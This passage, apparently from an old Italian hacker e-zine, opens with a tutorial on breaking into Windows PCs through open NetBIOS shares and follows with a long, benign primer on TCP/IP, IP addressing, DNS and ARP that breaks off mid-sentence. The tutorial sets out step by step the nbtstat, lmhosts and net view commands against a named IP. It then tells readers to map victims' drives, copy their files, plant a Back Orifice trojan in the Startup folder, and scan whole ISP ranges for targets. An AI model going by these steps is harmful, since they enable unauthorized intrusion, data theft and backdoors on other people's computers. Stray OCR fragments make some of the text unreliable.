stabilimento di una connessione non serve a molto se non si smanetta in C 0 

VB. Lo sforzo di imparare un linguaggio verrà ricompensato dalla capacità di 

poter capire e commentare, ad esempio, un programma per creare pacchetti TCP, leggendo il 
sorgente o magari di poterlo modificare per una diversa utilità. Le e-zine tecniche come BFI partono 
da questo presupposto. Adesso tocca a voi. 


* Introduzione: 

Il Netbios?? Che è?. Il Netbios è una cosina fatta da Microsfott ® che serve a sfruttare le reti locali 
LAN IPX. Dato che il nostro caro amico Bill è fissato con integrare tutto con internet ha integrato pure 
questo Netbios, rendendolo facilmente accessibile da chiunque via rete. Ma che simpatico questo 
nostro caro amico Bill. 


* Configurazione del pc: 

Per sfruttare le risorse di questa miniera d'oro chiamata netbios bisogna configurare il proprio pc con su 
montato winzozz "M. Eh si mi dispiace ma il caro sistema disoperativo del vecchio Bill è necessario. 
Ora andate nelle proprietà della vostra connessione di accesso remoto, in tipi di server, e mettete accedi 
alla rete. Fatto ciò andate in avvio\impostazioni\pannello di controllo\rete e aggiungete i seguenti 
client: 


Client per reti microsoft 
Client per reti netware (che automaticamente aggiungerà il protocollo compatibile IPX/SPX, se non 
lo fa fatelo voi) 


E il protocollo Netbios. 

Fatto ciò andate nelle proprietà del client per reti microsoft e selezionate connessione rapida, dopodiché 
nelle proprietà del protocollo compatibile IPX/SPX mettete attiva Netbios. Fate OK e dopo aver 
installato i driver (per i piratoni ci vuole il cd di windows) riavviate il pc. Ora siete pronti per fare 
kasino!!! 


* Hacking dei computer Netbiossati: 

Volendo fare un po' di teoria vi dirò che il Netbios lavora sulla porta 139 TCP/UDP (si proprio quella 
del winnuke). 

Prima di tutto beccate un computer col sysadmin scemo e il Netbios attivo (come farlo ve lo spiego 
dopo). Vi faccio un esempio pratico così anche i più grulli capiscono come funziona la cosa (senza 
offesa per i più grulli hihi =)). 

Allora io becco l'ip della macchina (212.216.34.144) poi vado nel prompt di msdos (evvivaa niente 
winzozz ÎM per ora) e scrivo: 


cd x:\windows 
nbtstat -A 212.216.34.144 


Vi risponderà: 
NetBIOS Remote Machine Name Table 


Name Type Status 
HALL9000 <00> UNIQUE Registered 
WORKGROUP <00> UNIQUE Registered 
HALL9000 <03> UNIQUE Registered 
HALL9000 <20> UNIQUE Registered 
WORKGROUP <1E> UNIQUE Registered 


A questo punto ci segniamo il primo nome della lista, HALL9000 (notate che nel Netbios tutto è scritto 


maiuscolo), e facciamo: 

edit x:\windows\lmhosts 

Nell'editor del dos scriviamo: 
212.216.34.144 HALL9000 #PRE 


Il tag #PRE è fisso e va sempre messo, gli spazi sono fatti col TAB (non usate altro). Salvate e uscite. 
Ora per caricare questo file scrivete: 


nbtstat -R 


Vi dovrebbe rispondere (se vi risponde altro o avete sbagliato a editare il file oppure avete configurato 
male il pc): 


Successful purge and preload of the NBT Remote Cache Name Table. 
Ora vediamo se ci sono risorse condivise nel pc. Fate: 
net view \\HALL9000 


Se non ci sono risorse condivise o non si ha il permesso di accedervi vi risponderà con un errore, 
altrimenti vi dirà: 


Risorse condivise su \\HALL9000 


Condivisione Tipo Commento 


Disco 

Disco 

Disco 

Disco 

Disco 
P Stampa 
Esecuzione comando riuscita. 


DOTNdVO 


Tombola!! Ci siamo abbiamo i nomi delle sue risorse condivise. Ora basta uscire dal dos e andare in 
gestione risorse (si avete letto bene). Nel menu in alto andate in Strumenti\Connetti unità di rete. Ora 
come avrete già capito si assegna una lettera al vostro "nuovo hd" che avrete (cioè l'hd dell'altro) e 
scrivete \\HALL9000\C per esplorare la condivisione C (che probabilmente sarà il C: del tipo), 
\\HALL9000\D per la condivisione D e così via. Avrete notato sicuramente che oltre ai vari dischi li c'è 
anche la condivisione HP di tipo "Stampa". Vuol dire semplicemente che quella condivisione è 
connessa alla stampante del tipo e potete stampare i vostri file con la sua stampante.. divertente no? =). 
Naturalmente sarà tutto abbastanza lento perché avverrà via internet, non sarà come esplorare i vostri 
hd di certo. Bene ora che sapete come accedere agli hd passiamo a cose più importanti. Prima di tutto 
vi chiederete come fare a prendere e a mettere file. E' semplice, dato che l'hd in remoto è come se fosse 


il vostro, quindi basta fare copia e incolla. Come fare invece per eseguire i file? Non è così semplice 
come pensiate, cliccando sul file .exe in remoto si eseguirà sul VOSTRO pc (ovviamente) quindi 
dovete giocare d'astuzia. Se volete mettere un trojan settatelo in modo da mandarvi una email con l'ip 
ogni volta che il pc va online, dopodiché mettete questo trojan in c:\windows\menu 
avvio\programmi\esecuzione automatica\ oppure in c:\windows\start menu\program files\startup (non 
ne sono sicuro però, non ho la versione inglese di windows). Poi fate in modo di riavviare il pc se è un 
server fisso, altrimenti aspettate il giorno dopo (per vedere se è un server guardate la lista di ID 
dell'nbtstat -A, se ce ne sono più di 4-5 allora probabilmente è server). Smurfatelo, nukkatelo, provate 
tutto. Consiglio di usare il BO dato che all'avvio si cancella da esecuzione automatica. Inoltre quando 
entrate con gestione risorse se il sysadmin è un po' furbo vi verrà chiesta una password (non 
preoccupatevi, ciò è molto raro). Exploits o un brute force per queste password purtroppo non ne 
conosco, se voi si allora mandatemi informazioni. Ultima cosa, quando i nomi degli ID o delle 
condivisioni contengono spazi dovete usare gli "". Ad esempio se con nbtstat -A troviamo il nome TRA 
LLA allora nel Imhosts dovremo scrivere: 


numero ip "TRALLA" #PRE 

E poi 

net view "\\TRA LLA" 

E se vediamo che ha una condivisione chiamata BLA BLA allora faremo in gestione risorse: 
"\\TRA LLA\BLA BLA". 


* Trovare i computer Netbiossati: 

Questo è molto semplice, basta un programma chiamato Legion (lo trovate su http://rhino9.ml.org o al 
mio sito http://kalidor.tsx.org) che scanna dei range di ip. Io consiglio di provare sempre il dominio 
212.216.* dato che ho scoperto che quella zona è strapiena di ip Netbiossati (infatti è la zona principale 
della TIN;-)). 


GUIDA TCP/IP 


Guida TCP/IP 


Miliardi di bit viaggiano ogni giorno sulla Rete. Vi siete mai chiesti come fanno ad arrivare al corretto 
destinatario? In questo articolo, primo di una serie vi presentiamo "la suite di protocolli TCP/IP" cioè le 
regole utilizzate per la trasmissione su Internet. Non è certo fondamentale sapere come funziona uno 
spinterogeno o un albero di trasmissione per guidare un'automobile. Analogamente, al giorno d'oggi, 
non serve sapere come funziona un computer per poterlo utilizzare. La tecnologia ci scherma sempre di 
più dal come una cosa funziona spostando l'attenzione sul cosa fare per utilizzarla. Così, quella che era 
una volta tecnologia per un'élite abbastanza ristretta di studiosi, ricercatori e studenti, è oggi una realtà 
a disposizione di tutti. Non solo è diventato semplice navigare nella Ragnatela, ma oggi chiunque può 


facilmente costruirsi le sue pagine e agganciarle a uno dei tanti siti Web che ospitano pagine private. 
Non c'è più neanche bisogno di conoscere l'HTML, grazie alla proliferazione di editor HTML 
commerciali e di pubblico dominio. In quanto ai risultati estetici, beh, lì non c'è programma che tenga. 
Ma cosa c'è sotto a tutto ciò? Per chi è ancora e nonostante tutto interessato a capire come funzionano 
le cose, e se vogliamo anche per coloro ai quali la cosa non interessa per niente, ma hanno qualche 
minuto per leggere un paio di paginette e poi, chissà, potrebbe sempre tornare utile... insomma, per chi 
vuole, ecco a voi il "TCP/IP, questo sconosciuto". 

Il nome completo è TCP/IP Internet Protocol Suite, ed è un insieme di protocolli di trasmissione di cui i 
due principali sono appunto il TCP (Transmission Control Protocol) e l'IP (Internet Protocol). Ma che 
cosa è esattamente un protocollo? Essenzialmente è una serie di regole per comporre dei messaggi e per 
far sì che essi possano essere scambiati tra due macchine. Non stiamo parlando solo di computer. 
Anche una centrale telefonica meccanica può ricadere in questa definizione. Un protocollo può 
contenere regole estremamente dettagliate, come quelle che identificano il significato di ogni singolo 
bit nella costruzione di un messaggio, oppure fornire uno scenario di alto livello, come per esempio 
definire come avviene il trasferimento di un file da un computer a un altro. Fondamentalmente un 
protocollo sta alla trasmissione dati come un linguaggio di alto livello quale il C++ sta alla 
programmazione. Infatti, un linguaggio di programmazione comprende sia regole estremamente 
dettagliate che devono essere seguite alla lettera - guai a dimenticare anche un solo punto e virgola alla 
fine di un'istruzione C++ - sia strutture di alto livello che vanno costruite nel modo corretto, pena errori 
nella struttura logica del programma. 

Una generica architettura di trasmissione è formata da una torre a più piani, dove ogni piano 
rappresenta una precisa responsabilità nella trasmissione dei messaggi. Alla base della torre sta la porta 
di accesso alla rete fisica, che potremmo pensare come una rete di strade. Ogni piano prende il 
messaggio che arriva dal piano superiore, lo mette in una busta con alcune informazioni aggiuntive, e 
lo passa come messaggio al piano inferiore. 

Le regole di comunicazione tra i vari piani sono dette interfacce. Il messaggio risultante, formato da 
tante buste una dentro l'altra, viene immesso nella rete dalla porta che si trova alla base della torre. Una 
volta arrivato al piano terreno infatti, esso viene trasportato alla torre di destinazione e da qui risale un 
piano dopo l'altro fino all'ultimo piano, detto anche livello applicativo. Ogni piano della torre di 
destinazione apre solo la busta che gli compete e usa le informazioni aggiuntive per recapitare la busta 
successiva al piano superiore. Le informazioni aggiuntive rappresentano il protocollo di 
comunicazione. Ogni piano comunica quindi solo con il piano corrispondente. 

Esempio: Il direttore della Pippo e Figli manda una lettera riservata al direttore della Pluto e Consorte. 
Il modo con cui i due comunicano, per esempio i riferimenti a lettere precedenti, lo stile della lettera, il 
modo di salutare alla fine della lettera, e così via, rappresenta il protocollo ad alto livello, cioè quello 
applicativo. Per spedire la lettera il direttore lo passa alla sua segretaria. Ciò avviene secondo le regole 
interne della 

Pippo e figli, ed è perciò un'interfaccia. La segretaria prende la lettera, la mette in una busta 
aggiungendo il nome del destinatario e la scritta RISERVATO. Queste informazioni sono per la sua 
controparte nella Pluto e consorte, ed è quindi anch'esso un protocollo. La busta viene quindi passata 
all'Ufficio Posta dell'edificio secondo la procedura ordinaria (altra interfaccia), il quale aggiunge 
l'indirizzo completo, il CAP e altre informazioni necessarie alla spedizione, e la passa quindi al 
corriere, che rappresenta il meccanismo fisico di trasferimento del messaggio. Terzo protocollo. 
Quando la lettera arriva, questa viene gestita dall'Ufficio Posta della Pluto e consorte che, dopo aver 
buttato la busta esterna con l'indirizzo dell'edificio, la passa alla segreteria del direttore. Questa registra 
l'arrivo della missiva, la toglie dalla busta più interna, e poi consegna la lettera vera e propria al 
direttore della Pluto e consorte. 


È evidente che perché il sistema funzioni bisogna che i vari protocolli siano rispettati da entrambe le 
aziende. Mentre infatti le interfacce possono essere diverse (ogni azienda ha le sue procedure interne), i 
protocolli devono essere stati concordati prima, altrimenti alcune informazioni potrebbero andare perse, 
o addirittura la lettera potrebbe non essere recapitata in tempo. Pensate a una segretaria italiana che 
riceve una busta da una consociata asiatica con sopra scritto URGENTE in cinese! Ne nasce una 
considerazione importante. La base di ogni protocollo è il concetto di standardizzazione. Più vasta è 
l'accettazione dello standard, più forte e diffuso è il protocollo. Gli standard internazionali sono in 
genere i più importanti, ma non sempre. Un esempio è proprio il TCP/IP, nato per volontà dell'agenzia 
americana DARPA (Defense Advanced Research Projects Agency) e poi diventato di fatto il maggior 
sistema di protocolli per l'interconnessione di reti a livello mondiale. 

Internet è fatta a strati Internet è basato su tre livelli concettuali: il livello applicativo (Application 
Services), quello del trasporto (Reliable Stream Transport Service) e quello della spedizione dei 
pacchetti (Connectionless Packet Delivery Service). Per capire il TCP/IP, è necessario a questo punto 
capire bene che cosa è Internet. Tanto per cominciare Internet non è una rete di comunicazione. Una 
rete di comunicazione è in genere legata alle necessità specifiche di chi l'ha disegnata e dell'hardware 
utilizzato per implementarla. Costruire una rete ideale che vada bene per qualsiasi esigenza, o pensare 
di poter limitare a un solo tipo di hardware l'implementazione di una qualunque rete non solo non è 
fattibile, ma neanche auspicabile, date le limitazioni delle tecnologie attuali. A volte è necessario far 
correre i dati molto velocemente in un ambito molto ristretto, come per esempio all'interno di un 
edificio. Altre volte si ha l'esigenza di trasmettere dati a migliaia di chilometri di distanza in modo 
molto affidabile, anche se questo può significare un rallentamento nella velocità di trasmissione. Se si 
cercasse di utilizzare lo stesso hardware in entrambi i casi, i costi sarebbero assolutamente inaccettabili. 
La soluzione è l'interconnessione delle reti, o internetworking. Grazie a ponti di collegamento (detti 
gateway) e la definizione di opportuni protocolli, si possono collegare fra di loro reti anche molto 
diverse, fornendone agli utenti una visione comune. Questa è la forza di Internet rispetto alle varie reti 
proprietarie, e di conseguenza del TCP/IP sui vari protocolli proprietari. Il TCP/IP è un insieme di 
regole pubbliche, aperte a tutti, o come si dice nell'ambiente, un sistema aperto (open system), che 
permette l'interconnessione di reti anche molto differenti, indipendentemente dalla tecnologia usata da 
ogni rete. I suoi principali vantaggi sono appunto l'indipendenza dalle tecnologie delle singole reti 
interconnesse, la possibilità di far comunicare fra di loro ogni computer connesso al sistema, la 
possibilità di trasmettere conferme di ricezione (acknowledgement) direttamente dal destinatario al 
mittente, e soprattutto una notevole quantità di protocolli applicativi per qualunque possibile bisogno, 
come vedremo più avanti. Il TCP/IP definisce quindi una unità di trasmissione dati chiamata datagram, 
e le regole da seguire per trasmettere un datagram in una particolare rete. 

Il principio che sta alla base dell'interconnessione è quello di schermare le applicazioni dalle 
caratteristiche fisiche delle reti in modo semplice e flessibile. Questo avviene attraverso un livello 
intermedio che si occupa di spedire e ricevere piccoli pacchetti di dati fra due punti qualsiasi del 
sistema di reti. Questo meccanismo si chiama packet-switching. Esso consiste nella divisione di ogni 
messaggio in un certo numero di pacchetti di dati. Ogni pacchetto è formato da poche centinaia di byte, 
e contiene una intestazione che fornisce informazioni sul destinatario e su come raggiungerlo. Questo 
meccanismo ha il vantaggio di ottimizzare l'utilizzo della rete, parallelizzando la trasmissione di più 
messaggi contemporaneamente. Lo svantaggio è che ogni nuovo sistema che si aggancia alla rete per 
trasferire dati riduce la disponibilità della rete per tutti gli altri sistemi già connessi. Una rete infatti ha 
una certa capacità ben definita, che dipende sostanzialmente dalla tecnologia hardware e software che 
utilizza. Tale capacità viene misurata in bit per second (bps). Questa grandezza non rappresenta la 
velocità dei dati in rete, come si potrebbe pensare in prima istanza, bensì dà una misura del numero 
massimo di bit che possono essere trasmessi nella rete in un secondo. La velocità reale di un singolo 
messaggio dipende da tanti fattori, come il numero di sistemi che stanno utilizzando la rete, la qualità 


delle connessioni e di conseguenza il numero di tentativi necessari per trasferire correttamente i dati, le 
modalità di trasmissione e i dati aggiuntivi necessari al trasferimento degli stessi. 

Ci sono altri modi per trasferire dati in una rete: per esempio, quando fate una telefonata, la rete 
stabilisce un collegamento diretto fra il vostro telefono e quello della persona chiamata. A questo punto 
il telefono incomincia a campionare il microfono della vostra cornetta in modo continuo, trasferendo il 
segnare al ricevitore all'altro capo. Il tutto a 64.000 bit per secondo, che è la velocità di campionamento 
necessaria a digitalizzare la voce. Questo avviene comunque, indipendentemente dal fatto che stiate 
parlando o meno. Anche se state in silenzio la linea è saturata al massimo della sua capacità. Questo 
meccanismo è detto circuit-switching. Al contrario del meccanismo usato dal TCP/IP, quello cioè a 
pacchetti, la linea è completamente assegnata alla comunicazione in atto, per cui il fatto che altri stiano 
telefonando non riduce la capacità della connessione. D'altra parte la linea è utilizzata completamente 
indipendentemente dal fatto che ci siano o meno dati da trasferire. Di qui gli elevati costi di tale 
meccanismo. La telefonata, infatti, la pagate lo stesso sia che parliate molto velocemente, sia che stiate 
completamente in silenzio. Questo meccanismo è troppo costoso per una rete informatica, specialmente 
se si tiene conto che la disponibilità di tecnologie hardware sempre più raffinate e veloci per il 
trasferimento dei dati bilanciano in buona parte quello che è uno dei punti deboli del sistema a 
pacchetti, e cioè l'impossibilità di garantire a ogni utente e in ogni momento una certa capacità di 
trasferimento ben definita. 

Torniamo al sistema a pacchetti. Per trasferire dati da un sistema a un altro ogni sistema ha un nome 
unico ben definito. Non esistono cioè due sistemi con lo stesso nome, anche se in reti diverse, 
indipendentemente da quale è il nome locale di un sistema nella sua rete di appartenenza. All'interno di 
ciascuna rete, i vari computer usano la tecnologia hardware e software specifica di quella rete. Tuttavia, 
grazie a questo strato intermedio di software, le varie applicazioni hanno una visione unica e globale 
del sistema interconnesso di reti, detto appunto internet. Notate la "i" minuscola. Il concetto di internet 
è infatti quello appena descritto. Viceversa Internet con la "I" maiuscola, identifica quel sistema di reti, 
basato sull'architettura internet, che viene detto anche Connected Internet. 

La connessione tra due reti avviene attraverso macchine opportune che sono collegate fisicamente a 
entrambe le reti, e hanno la responsabilità di far passare i vari pacchetti da una rete all'altra e viceversa. 
Tali macchine sono dette internet gateway, o anche IP router. Sono loro il vero elemento portante di 
una internet. Ogni router non solo deve sapere che determinati pacchetti vanno passati da una rete a 
un'altra, ma deve passare dall'altra parte anche pacchetti destinati a ulteriori reti connesse attraverso 
altri router. Essi però ragionano solo in termini di reti, non di destinazione finale. A un router non 
interessa chi è effettivamente il destinatario di un pacchetto, ma solo a quale rete appartiene. Questo 
semplifica molto l'implementazione di un router. Alla base del meccanismo dei router c'è l'indirizzo IP, 
o IP address. 

Ogni cosa che conosciamo ha un nome. Cane, casa, auto, e via dicendo. Se ci interessa specificare 
meglio ciò di cui stiamo parlando, possiamo assegnare un nome anche a un sottogruppo di cose. Così 
abbiamo che i cani bassotti sono alquanto diversi dai San Bernardo, una catapecchia non è certo una 
villa, e una Ferrari costa un po' più di una Cinquecento. Se poi dobbiamo identificare una cosa in modo 
chiaro e univoco, è necessario assegnarle un nome che solo quella cosa ha. Già un nome come Mario 
Rossi non va bene, perché non è unico, e comunque, anche se scegliessimo oggi un nome veramente 
strano e originale, non avremmo la garanzia in futuro di non ritrovarci con un caso di omonimia. Ecco 
allora le targhe per le automobili, i codici fiscali per le persone, i numeri di telefono, e via dicendo. 
Ognuno di questi nomi ha tre caratteristiche. La prima è che esiste un organo competente centrale che li 
assegna, proprio per garantirne l'univocità. La seconda, è che hanno una struttura a sottogruppi. 
Esistono cioè degli elementi che garantiscono l'univocità a un certo livello, all'interno del quale esiste 
una certa libertà di scelta, e così via, livello dopo livello. Per esempio, il codice fiscale viene costruito 
in modo che un uomo e una donna non possano mai avere lo stesso codice, anche se fossero nati lo 


stesso giorno, nella stessa città e si chiamassero nello stesso modo. Similmente, i numeri di telefono di 
due città diverse si distinguono per il prefisso e se queste si trovano anche in stati diversi, per il prefisso 
internazionale. 

Affinché internet possa rappresentare un sistema universale di comunicazione, permetta cioè di far 
comunicare qualunque macchina connessa a una delle sue reti con una qualsivoglia altra macchina 
connessa alla stessa o a un'altra rete, è necessario fornire ogni macchina di un nome unico a livello 
globale. Internet fomisce ogni sistema di un nome, che identifica il sistema stesso, di un indirizzo, che 
mi dice dove si trova il sistema, e di un cammino, che mi dice come raggiungere il sistema. Ogni 
macchina connessa a una rete è detta host, nella terminologia internet. Lo stesso termine ha significati 
differenti in altri contesti informatici, come per esempio in quello client/server, o nel caso di 
mainframe. Attenzione a non fare confusione quindi. In internet un host può essere anche un vecchio 
8088 con 640K di RAM e 10M di disco fisso. 

L'indirizzo, o IP address, è un campo composto da 32 bit. I primi bit permettono di distinguere 5 forme 
standard identificate da una lettera del alfabeto, e dette classi. Le prime tre classi dell'IP address 
contengono sia l'indirizzo di una rete (netid), sia quello di una macchina nella stessa (hostid). In realtà 
l'indirizzo non identifica necessariamente una macchina, ma una connessione alla rete. Per esempio, un 
router ha almeno due indirizzi, avendo connessioni ad almeno due reti. Questo in quanto un router 
appartiene a entrambe le reti, e quindi sono necessari due indirizzi dato che un IP address ha posto per 
un solo indirizzo di rete. Se l'indirizzo dell'host è 0, allora l'IP address si riferisce alla rete stessa. Se 
viceversa tutti i bit riservati all'indirizzo dell'host sono 1, allora l'indirizzo viene utilizzato per 
identificare tutti gli host della rete (broadcasting). Uno speciale indirizzo formato da 32 bit posti a uno 
è chiamato local network broadcast address e serve solo in casi molto particolari. Il concetto di 
broadcasting è quello della diffusione a tutto raggio, un po' come fa un'emittente radiofonica. In 


ky" 


generale internet interpreta i campi formati da tutti uno come all, cioè "tutti", mentre quelli formati da 
tutti zero come this, cioè "questo", "qui". Questo per quanto riguarda le classi A, B e C. La classe D è 
usata per un particolare tipo di distribuzione dei dati detto multicasting. La classe E è riservata a usi 
futuri. Dato che specificare ogni singolo bit di un indirizzo IP sarebbe alquanto poco pratico e di scarsa 
leggibilità, la convenzione è quella di leggere ogni ottetto, cioè ogni gruppo di 8 bit, come un intero, e 
di separare i quattro ottetti con un punto. Oltre a i casi speciali già descritti, l'indirizzo di classe A 
127.0.0.0 è riservato per un particolare processo di test che rimanda indietro i dati al mittente senza 
propagarli nella rete. 

Uno dei vantaggi di questo schema è la possibilità da parte dell'organismo centrale che assegna gli 
indirizzi (Network Information Center) di delegare ai responsabili delle singole reti l'assegnazione di 
una parte dell'indirizzo all'interno della rete stessa. La cosa avviene un poco come con i numeri di 
telefono. A livello internazionale ogni stato ha il suo prefisso internazionale. Per esempio, per l'Italia, è 
39. All'interno ogni stato divide il paese in aree geografiche a cui assegna un ulteriore codice. Per 
esempio, Roma è identificata dal 6, Milano dal 2, Firenze da 55, e così via. All'interno poi della 
provincia o della città possono essere definite ulteriormente sottoaree a cui si assegnano due, tre o 
quattro cifre. Per esempio 529 oppure 7054. Infine ogni telefono in tali aree avrà il suo numero. Così, 
se Mr. Smith deve chiamare dagli Stati Uniti il signor Mario Rossi abitante all'EUR, a Roma, comporrà 
per esempio il numero 011.39.6.529.4467. In questo caso lo 011 serve per uscire dagli USA, un po' 
come il nostro 00. 

Analogamente in internet i numeri di classe C sono assegnati alla piccole reti, quelle cioè con meno di 
256 host, quelli di classe B alle reti con al massimo 65536 host, e quelli di classe A alle reti con oltre 
16 milioni di host. Ogni rete decide poi come suddividere gli indirizzi che gli sono stati riservati al suo 
interno come meglio crede. Ovviamente, una internet privata non ha la necessità di seguire queste 
regole, né a utilizzare indirizzi assegnati dal NIC, ma il non farlo potrebbe impedire in futuro la 
connessione alla TCP/IP Internet. 


Dato che l'indirizzo può essere a volte abbastanza ostico da ricordare, è possibili associare a ogni host 
anche un nome, che può essere utilizzato come mnemonico per un IP address, e la cui risoluzione è 
responsabilità di particolari macchine chiamate name server. In realtà il name server è un programma 
software che può girare in qualunque macchina connessa alla rete, e che mantiene l'associazione tra 
nomi e indirizzi IP, fornendo tali corrispondenze quando richiesto da un altro programma chiamato 
name resolver. Di fatto, si preferisce far girare il name server su una macchina dedicata, che prende 
anch'essa, a questo punto, il nome di name server. Potete pensare al name server come a una agenda 
telefonica elettronica, che contiene una lista parziale di nomi e numeri telefonici. In internet infatti, non 
esiste un singolo elenco telefonico, ma tanti name server che cooperano per fornire quello che è un vero 
e proprio elenco distribuito. In realtà il sistema funziona in modo gerarchico, un po' come se una certa 
agenda contenesse solo i prefissi internazionali e il puntatore alle agende di ogni singolo stato, le quali 
a loro volta contengono i prefissi regionali e i puntatori agli elenchi regionali, e così via, fino ad 
arrivare all'agenda che contiene solo le estensioni telefoniche di un singolo edificio. 

I nomi Internet sono basati su una serie di regole dette Domain Name System (DNS), che si basa 
appunto su uno schema gerarchico in cui il nome è suddiviso in varie parti separate fra loro da punti. 
Per esempio, vnet.ibm.com. Ogni suffisso è a sua volta un dominio. Quindi, nel nostro esempio, 
ibm.com è un dominio di secondo livello, mentre com è un dominio di terzo livello. I domini ufficiali 
riconosciuti dal NIC al livello più elevato sono riportati in tabella 1. Una rete può richiedere di essere 
registrata come categoria, oppure usando il dominio geografico. Per esempio, l'Italia ha come dominio 
base it. Supponiamo che il governo decida di costruire un insieme di reti cittadine interconesse fra loro 
e connesse a Internet. Si può pensare di assegnare a ogni provincia un dominio xxxxxx.it. Per esempio, 
Firenze avrebbe come dominio firenze.it. L'università di Firenze potrebbe registrare la sue rete come 
unifi.edu, e in tal caso sarebbe direttamente il NIC a dover dare l'autorizzazione per tale nome, essendo 
il dominio edu sotto responsabilità dell'organismo centrale di controllo, oppure potrebbe decidere di far 
parte del dominio cittadino, come unifi.firenze.it, e quindi potrebbe richiedere il permesso di registrare 
tale nome direttamente all'amministratore del dominio di Firenze. A questo punto, se il dipartimento di 
Fisica di Arcetri vuole registrare un proprio dominio, deve chiederlo solo all'Università stessa, 
ricevendo così, per esempio, arcetri.usf.fi.it oppure fisica.usf.fi.it. 

Esiste una piccola complicazione. Ogni oggetto connesso alla rete ha un tipo. Oggetti di tipo diverso 
possono avere lo stesso nome. Per cui, per poter risolvere un nome e ottenere indietro l'indirizzo IP, è 
necessario anche specificare il tipo di oggetto: macchina, utente, casella postale, e via dicendo. Dal solo 
nome non è possibile evincere il tipo di oggetto. 

Il DNS definisce anche come associare i nomi agli indirizzi IP, e come ottenere quest'ultimi dal nome. 
In realtà lo schema è ancora più generale di quanto può sembrare, in quanto permette di estendere la 
sintassi del nome per usi specifici, sfruttando anche il concetto di tipo. Per esempio, nel caso di una 
casella postale (tipo MX), il nome sarà del tipo utente@dominio. 

Per esempio ddejudicibus@tecnet.it 

Innanzi tutto una internet è un sistema di interconnessione fra reti differenti che utilizza sia sistemi 
dedicati per la connessione, detti gateway, sia uno strato (layer) di protocolli che mostrano alle 
applicazioni una visione omogenea di una rete virtuale e che sono basati sulla trasmissione di piccoli 
pacchetti di dati. Ogni pacchetto porta con sé l'indirizzo del destinatario il quale identifica 
univocamente sia la rete di destinazione che la connessione alla quale deve essere recapitato il 
pacchetto. Un sistema connesso a più reti della stessa internet avrà quindi più indirizzi IP. Un 
opportuno software, spesso installato su macchine dedicate, permette di associare a ogni indirizzo un 
nome di più facile utilizzo da parte degli utenti del sistema. Il formato di questo nome si basa su un 
insieme di regole dette DNS. Quella che è universalmente conosciuta come Internet è di fatto la 
principale rete interconnessa esistente, che si estende praticamente su tutto il pianeta. 


Data questa premessa, vediamo di approfondire la trattazione dei protocolli TCP/IP. Innanzi tutto 
qualunque trasferimento di dati implica la trasmissione di bit da un sistema a un altro. Tali dati devono 
essere correttamente interpretati dai vari sistemi connessi alla rete. Data l'enorme varietà di hardware e 
di sistemi operativi questo è tutt'altro che banale. Nei protocolli di trasmissione i bit vengono 
convenzionalmente raggruppati per multipli di otto, detti ottetti. Una volta questo corrispondeva al bus 
da 8 bit, cioè un byte, tipico dei computer. Oggi la maggior parte dei computer usa parole di almeno 32 
bit. Tuttavia non tutte le macchine memorizzano tali parole nello stesso modo. Esistono vari modi per 
memorizzare un intero rappresentato da 32 bit. In quello detto Little Endian, la posizione più bassa in 
memoria contiene il byte di ordine più basso dell'intero. Nei sistemi Big Endian avviene esattamente il 
contrario, cioè la posizione più bassa in memoria contiene il byte di ordine più elevato. In altri sistemi 
ancora il raggruppamento viene fatto con parole da 16 bit, in cui la parola meno significativa viene 
appunto prima. Il risultato è lo stesso del Little Endian ma con i byte invertiti all'interno di ogni singola 
parola. È evidente che non è pensabile che sia la rete a gestire tutti questi modi diversi di interpretare i 
dati, anche perché di solito i protocolli di trasmissione non entrano nel merito di come ragionano i 
singoli sistemi, ma si occupano solamente di trasferire in modo più o meno affidabile i dati a loro 
affidati. Ne consegue la necessità di definire un formato standard valido per tutti i dati che corrono 
lungo i collegamenti, lasciando a i vari sistemi il compito di effettuare le opportune conversioni locali. 
Lo standard internet prevede che gli interi vengano trasmessi a partire dal byte più significativo, 
secondo lo stile del Big Endian. 

Così in un pacchetto, un intero ha il byte più significativo verso la testa del pacchetto e quello meno 
significativo verso la coda dello stesso. 

A questo punto i sistemi sono in grado di scambiarsi i dati in modo non equivoco. Ma come fa a sapere 
la rete internet che un sistema è collegato, e soprattutto, come avviene l'associazione tra l'IP address e 
l'indirizzo fisico di rete? Ogni rete fisica infatti ha un suo formato per gli indirizzi fisici assegnati alle 
connessioni di rete. In generale esistono due modi di assegnare indirizzi fisici alle macchine connesse 
in rete. In una rete piccola, come può essere una Token Ring, cioè un anello di un paio di centinaia di 
macchine al massimo, a ogni connessione può essere assegnato un intero basso, per esempio compreso 
tra 1 e 254. Questo sistema ha il vantaggio di associare l'indirizzo fisico alla connessione piuttosto che 
alla scheda che permette la stessa. Per cui, se la scheda si rompe, l'utente può cambiarla senza dover 
tuttavia modificare l'indirizzo fisico di rete, purché imposti sulla nuova scheda lo stesso indirizzo di 
quella vecchia. Lo svantaggio è che non esiste alcun controllo che impedisca a due utenti sulla stessa 
rete di impostare lo stesso indirizzo fisico, creando così una collisione. In altri tipi di reti, come per 
esempio Ethernet, ogni scheda ha già preimpostato da parte del costruttore un indirizzo fisico fisso, per 
cui non c'è alcun rischio di collisione, ma cambiare la scheda vuol dire dover necessariamente cambiare 
indirizzo fisico. Inoltre, dato che questo indirizzo è unico non solo fra le schede installate su una certa 
rete, ma in assoluto fra tutte le schede costruite, esso è generalmente molto lungo. Nel caso di Ethernet 
è di ben 48 bit. 

Associare un IP address a un sistema con indirizzi formati da piccoli numeri e per giunta tali che a 
parità di connessione l'indirizzo non cambia mai, come nel caso di una rete proNET-10, è molto 
semplice. Per esempio, per un IP address di classe C, si può usare l'indirizzo fisico come host identifier. 
Così, se la rete ha IP address del tipo 10.214.32.x, l'host con indirizzo fisico 16 avrà IP address 
10.214.32.16. Un altro paio di maniche è gestire indirizzi molto più lunghi dei 32 bit utilizzati per gli 
indirizzi internet, e per giunta che possono cambiare nel tempo a parità di connessione. Ovviamente si 
potrebbe tenere da qualche parte una tabella per gli accoppiamenti, e di fatto si fa così, ma non è certo 
molto pratico pensare che qualcuno la tenga aggiornata a mano. Il problema è stato risolto 
efficacemente utilizzando un meccanismo di risoluzione dinamica implementato dal protocollo ARP, o 
Address Resolution Protocol. 


ARP funziona più o meno così. Quando un host deve spedire un pacchetto a un certo destinatario, 
spedisce a tutti gli host nella stessa rete fisica un messaggio in cui chiede chi è l'host con quel ben 
preciso IP address. Nello stesso messaggio mette anche i propri indirizzi, sia quello fisico che quello 
IP. Si adopera cioè una tecnica di broadcasting. L'host il cui IP è quello cercato, rimanda indietro al 
richiedente il proprio indirizzo fisico, permettendo così l'associazione tra i due. Ciò è possibile in 
